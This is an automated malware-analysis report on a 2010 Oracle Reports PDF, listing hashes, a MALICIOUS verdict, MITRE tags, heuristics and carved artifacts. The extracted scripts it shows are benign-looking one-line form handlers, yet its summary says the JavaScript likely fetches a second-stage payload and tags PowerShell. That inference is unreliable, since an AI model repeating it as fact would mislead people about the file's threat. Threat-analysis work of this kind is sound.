Malicious PDF — malware analysis report

Static analysis result for SHA-256 36c34d74192710fc…

MALICIOUS

PDF

68.3 KB Created: 2010-08-18 15:02:21 Authoring application: Oracle9iAS Reports Services (via Oracle PDF driver) First seen: 2026-05-10
MD5: 7b30a488212cf263af0976d8f5951b28 SHA-1: 9ef4d685fb7ab6965b4b0843b6aefa8bc0b7a12b SHA-256: 36c34d74192710fc0da82d9eee5558f86f9148099918f75543b0ae325804f214
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The PDF contains embedded JavaScript streams and an AcroForm button with an action trigger, indicating an attempt to execute code. The presence of ASCII85Decode filters, often used to obfuscate malicious content, further supports this. The embedded JavaScript is likely responsible for downloading and executing a second-stage payload, although the exact nature of the payload cannot be determined from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 0.8896

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ASCII85Decode filter (with exploit indicators) low PDF_FILTER_85
    ASCII85 encoding filter present alongside exploit delivery indicators — uncommon outside of obfuscation
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0071_000.js pdf-javascript-stream PDF /JS object 71 at offset 0x6945 40 bytes
SHA-256: bfcbd66b81ce376d9f45363a3d634e9e4d57e1fb200b1cc30990893ece7f6c1f
Preview script
First 1,000 lines of the extracted script
OCLN.OCLN_fieldFocus(event.target.name);
javascript_obj0087_001.js pdf-javascript-stream PDF /JS object 87 at offset 0x7559 38 bytes
SHA-256: ed4b5cde3f355cfe3b30961fd3042fd75b91b0a37a8a62daa3f59a1db9f6ef58
Preview script
First 1,000 lines of the extracted script
OCLN_checkHiddenBox(event.targetName);
stream_002_off000027d0.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x27D0 104368 bytes
SHA-256: f8d9ddcd9d5728b74aee25485cc451ae69d3f1d914db51b4c793504f4e43e37c